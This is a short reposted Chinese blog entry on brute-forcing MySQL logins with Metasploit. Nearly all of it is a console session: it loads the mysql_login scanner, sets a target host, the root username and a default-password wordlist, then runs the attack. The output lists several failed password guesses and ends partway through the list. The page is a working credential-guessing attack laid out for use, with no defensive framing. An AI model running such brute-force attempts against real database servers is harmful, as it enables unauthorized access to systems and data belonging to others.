码迷,mamicode.com
首页 > 数据库 > 详细

metasploit爆破mysql

时间:2018-02-03 20:55:07      阅读:320      评论:0      收藏:0      [点我收藏+]

标签:rem   gre   username   efault   exp   scanner   ann   def   name   

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set RHOSTS 5.5.5.3

RHOSTS => 5.5.5.3

msf auxiliary(mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt

PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

 
msf auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 5.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 5.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 5.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 5.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 5.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 5.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’

metasploit爆破mysql

标签:rem   gre   username   efault   exp   scanner   ann   def   name   

原文地址:https://www.cnblogs.com/xxrens/p/8410512.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!